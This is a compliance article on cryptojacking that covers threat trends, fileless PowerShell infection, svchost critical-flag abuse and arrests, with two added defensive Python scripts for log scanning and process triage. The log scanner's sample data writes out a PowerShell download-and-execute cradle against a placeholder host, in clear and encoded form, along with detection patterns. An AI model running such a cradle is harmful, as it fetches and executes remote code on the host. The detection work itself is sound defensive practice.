Corporate compliance officers who have only general knowledge of longstanding cybersecurity threats, such as phishing and ransomware, need to familiarize themselves with the growing threat of “cryptojacking.” Cryptojacking, also known as malicious cryptomining, is the unauthorized installation and use of cryptocurrency mining software on computers and mobile devices.
Cryptomining, of course, is integral to the verification of cryptocurrency transactions and the addition of those transactions to the blockchain digital ledger. But cryptomining “consumes processor cycles and their requisite electricity to process cryptocurrency transactions,” while earning a cryptominer who uses only his own computer a small amount of cryptocurrency. Because generating more substantial amounts of cryptocurrency requires vastly greater amounts of electricity and processing power, cybercriminals increasingly seek to outsource their cryptomining operations by obtaining unauthorized access to others’ computers, where they can draw on unused processing power.
If cryptojacking was already “out of control” in 2017, as a Wired article headline declared, more recent reports from cybersecurity firms indicate that cryptojacking in 2018 is (if it is possible) even more so:
- In June, a Kaspersky Lab report stated that during the 2017-2018 period, “cryptominer encounters rose in total number, from 1.9 million to 2.7 million, as well as in share of threats detected, from 3% to 4%.”
- In August, Trend Micro reported that in the first half of 2018, it had 787,146 cryptocurrency mining detections – 1,055 percent of the detections in the first half of 2017 (74,547) and 241 percent of the detections in the second half of 2017 (326,326) – and identified 47 new cryptomining malware families.
- In September, McAfee found that total cryptomining malware samples grew by 86 percent in the second quarter of 2018, and identified more than 2.5 million new cryptojacking files.
Moreover, certain features of current cryptojacking indicate that the problem is becoming more pervasive and more sophisticated:
- Geographic Expansion: Cryptojacking malware is being detected around the world, most notably in North and South America, Europe, and Asia.
- Expansion To and Within Corporate Entities: Cryptojacking is not limited to home computer users. In July, Kaspersky Lab analysts reported that they had observed a new cryptojacking malware, PowerGhost, that “is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” According to a Forbes article, cryptojackers are increasingly targeting servers. “Running in corporate and cloud data centers, servers are both vast in number and far more powerful than PCs and mobile devices, presenting . . . a fertile field for planting cryptojacking software.”
- Infection Techniques: What makes PowerGhost harder to detect and remove is its use of fileless techniques to embed the miner within the target system. The Kaspersky analysts noted that during the infection process, which can be carried out with exploits or remote administration tools, “a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.”
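The defender’s counterpart to the one-liner Kaspersky describes is to watch PowerShell script block logging (Windows event 4104 carries the script text) for the combination of a network fetch and an in-memory execute, including when the command arrives base64-encoded through -EncodedCommand. The Python below is an added example written for this article, not code from Kaspersky Lab or from the article’s author. The log lines it scans are constructed, the placeholder.invalid host stands in for wherever a real sample would fetch from, and the pattern lists are a starting point for a rule, not a complete one.

```python
"""Flag fileless PowerShell download-and-execute patterns in script block log text.

Added example (not from the article or Kaspersky Lab). Input lines are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Primitives that pull content over the network straight into memory.
DOWNLOAD_PATTERNS = [
    r"\bDownloadString\b", r"\bDownloadData\b", r"\bNet\.WebClient\b",
    r"\bInvoke-WebRequest\b", r"\biwr\b", r"\bInvoke-RestMethod\b", r"\birm\b",
]
# Primitives that run text as code without a file on disk.
EXEC_PATTERNS = [r"\bInvoke-Expression\b", r"\biex\b", r"\[ScriptBlock\]::Create\b"]
# Launch switches used to hide the window or skip profile/policy checks.
STEALTH_PATTERNS = [
    r"-w(?:indowstyle)?\s+hidden", r"-nop(?:rofile)?\b",
    r"-e(?:xecutionpolicy|p)\s+bypass",
]
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENCODED_RE = re.compile(
    r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _hits(patterns, text):
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; return the text, or None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    script: str
    download: list = field(default_factory=list)
    execute: list = field(default_factory=list)
    stealth: list = field(default_factory=list)
    encoded: bool = False

    @property
    def verdict(self):
        if self.download and self.execute:
            return "cradle"       # fetch + in-memory execute: the fileless pattern
        if self.download or self.execute:
            return "suspicious" if (self.stealth or self.encoded) else "review"
        return "benign"


def analyze(script_text):
    """Score one ScriptBlockText / command line, unwrapping -EncodedCommand if present."""
    scan_text = script_text
    encoded = False
    m = ENCODED_RE.search(script_text)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            encoded = True
            scan_text = script_text + " " + decoded   # scan the wrapper and the payload
    return Finding(
        script=script_text,
        download=_hits(DOWNLOAD_PATTERNS, scan_text),
        execute=_hits(EXEC_PATTERNS, scan_text),
        stealth=_hits(STEALTH_PATTERNS, scan_text),
        encoded=encoded,
    )


def scan_log(lines):
    """Return (line_number, verdict) for every line that is not benign."""
    results = []
    for n, line in enumerate(lines, 1):
        f = analyze(line)
        if f.verdict != "benign":
            results.append((n, f.verdict))
    return results


def build_samples():
    """Constructed log lines; the host name is a placeholder, not a real indicator."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/m')"
    encoded = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    return [
        r"Get-ChildItem C:\Users -Recurse | Measure-Object",
        r"Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\Temp\report.csv",
        'powershell.exe -nop -w hidden -c "' + cradle + '"',
        "powershell.exe -NoProfile -EncodedCommand " + encoded,
    ]


if __name__ == "__main__":
    for n, verdict in scan_log(build_samples()):
        print(f"line {n}: {verdict}")
```

The second sample shows why the two primitive lists are scored together rather than separately: a download that lands in a file is ordinary administration and only earns a “review” verdict, while a download fed directly to an in-memory execute is the pattern the article quotes, whether it appears in clear text or only after the encoded command is unwrapped.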
- Location of Cryptojacking Malware: Cryptojacking software can be embedded in places that are atypical of other types of malware. For example, security researchers reportedly “found cryptojacking code hidden on the Los Angeles Times’ interactive Homicide Report webpage that was quietly harnessing visitors’ CPUs to mine Monero cryptocurrency.”
- Malicious Response to Removal: 360 Total Security reported on one type of cryptomining malware that has been coded so that any attempt to remove it will crash the computer. At the outset, the malware launches svchost.exe, a system process that is part of the Windows operating system, and injects malicious code into it. It then sets svchost.exe’s attribute to “CriticalProcess.” As a result, an attempt to terminate the malware is treated by the system as the loss of a legitimate critical Windows process, and the computer crashes.
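What 360 Total Security describes is a process that looks like a Windows component but was started by the malware rather than by the service control manager, and that carries the critical-process flag, so that killing it triggers the same system-wide stop error (CRITICAL_PROCESS_DIED) Windows reserves for the death of a genuine critical process. A triage script therefore has to find such instances without terminating them. The Python below is an added example written for this article, not code from 360 Total Security or from the author. The process records are constructed, the field names are assumptions about whatever inventory source (an EDR export, Sysmon process-creation data) would supply them, and the rules encode what a legitimate service host looks like: it runs from System32, is a child of services.exe, and is not normally marked critical.

```python
"""Triage service-host (svchost.exe) instances for injection and critical-flag abuse.

Added example (not from the article or 360 Total Security). Process records are
constructed and the field names are assumptions about the inventory source.
"""
from dataclasses import dataclass

EXPECTED_IMAGE = r"c:\windows\system32\svchost.exe"
EXPECTED_PARENT = "services.exe"   # the service control manager starts every real service host
CPU_ALERT_PCT = 80.0               # sustained CPU above this is a weak, secondary signal


@dataclass(frozen=True)
class Proc:
    pid: int
    name: str
    image: str          # full path of the executable backing the process
    parent_name: str
    critical: bool      # break-on-termination flag as reported by the collector (assumed field)
    cpu_pct: float      # sustained CPU share over the sampling window


@dataclass
class Finding:
    pid: int
    severity: str       # "high": structural anomaly; "low": resource usage only
    reasons: list
    action: str


def recommended_action(critical):
    # The critical flag is exactly what turns a kill into a crash, so never
    # terminate such a process from a live session; capture evidence and isolate.
    if critical:
        return "do not terminate: isolate host, capture memory, remediate offline"
    return "capture memory, then terminate under incident-response procedure"


def triage_svchost(procs):
    """Return a Finding for every svchost.exe instance that deviates from the expected profile."""
    findings = []
    for p in procs:
        if p.name.lower() != "svchost.exe":
            continue
        structural, usage = [], []
        if p.image.lower() != EXPECTED_IMAGE:
            structural.append(f"image path {p.image} is not the System32 service host")
        if p.parent_name.lower() != EXPECTED_PARENT:
            structural.append(f"parent {p.parent_name} is not {EXPECTED_PARENT}")
        if p.critical:
            structural.append("critical flag set; terminating it would crash the host")
        if p.cpu_pct >= CPU_ALERT_PCT:
            usage.append(f"sustained CPU {p.cpu_pct:.0f}%")
        if structural or usage:
            findings.append(Finding(
                pid=p.pid,
                severity="high" if structural else "low",
                reasons=structural + usage,
                action=recommended_action(p.critical),
            ))
    return findings


def build_samples():
    """Constructed inventory: a clean host, an injected and flagged one, one run from a user path."""
    return [
        Proc(804, "svchost.exe", r"C:\Windows\System32\svchost.exe", "services.exe", False, 1.2),
        Proc(4120, "svchost.exe", r"C:\Windows\System32\svchost.exe", "wscript.exe", True, 97.0),
        Proc(5216, "svchost.exe", r"C:\Users\Public\svchost.exe", "explorer.exe", False, 95.0),
        Proc(900, "svchost.exe", r"C:\Windows\System32\svchost.exe", "services.exe", False, 88.0),
        Proc(1234, "browser.exe", r"C:\Program Files\Browser\browser.exe", "explorer.exe", False, 60.0),
    ]


if __name__ == "__main__":
    for f in triage_svchost(build_samples()):
        print(f"pid {f.pid} [{f.severity}] {'; '.join(f.reasons)} -> {f.action}")
```

The CPU signal is deliberately kept separate from the structural checks: a busy but correctly parented service host is a “low” finding worth a look, whereas a service host started by a scripting engine and marked critical is the case the article describes, and the script’s only output for it is a report and a handling instruction, never a kill.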
Because cryptojacking necessarily involves unauthorized access to computers, law enforcement authorities are prepared to investigate and prosecute cryptojacking schemes as cybercrime. During 2018, at least four countries pursued law enforcement actions against cryptojacking:
- China: 20 suspects were arrested “in a major cryptojacking case allegedly affecting over one million computers and generating 15 million yuan (about $2.2 million) in illicit profit.”
- Iceland: Police arrested 11 individuals in connection with the theft, from data centers in Iceland, of approximately 600 computers being used to mine bitcoin and other virtual currencies.
- Japan: Authorities arrested 16 men for allegedly using their websites to disseminate cryptomining malware, and a Japanese court reportedly sentenced a man who had used his blog to infect visitors with cryptomining malware to one year’s imprisonment (suspended for three years).
- Russia: Security officers arrested “several scientists working at a top-secret Russian nuclear warhead facility for allegedly mining crypto-currencies.”
Compliance officers and their information security counterparts therefore need to recognize that cryptojacking is a cybercrime and treat it accordingly. That means conducting a thorough review of what their companies are doing to address cryptojacking, including ensuring that their companies are using artificial intelligence and other techniques to identify penetration of corporate networks by cryptojacking teams. But it also means refreshing compliance training to increase employee awareness of cryptomining across the enterprise. Employees who notice significant slowing of their computers should be encouraged to report such occurrences, as they may be indicative of cryptojacking malware at work.
Finally, cryptojacking training needs to make clear to corporate employees that using company resources for cryptomining is prohibited under all circumstances. In one case, the cybersecurity firm Darktrace “picked up on puzzling traffic patterns within a European bank, including servers that seemed to be connecting from an IP address in the company’s data center. When they inspected it in person, by physically tracing cables, its experts realized that a rogue employee had set up a ‘c[r]ypto mining side business’ under the floorboards.”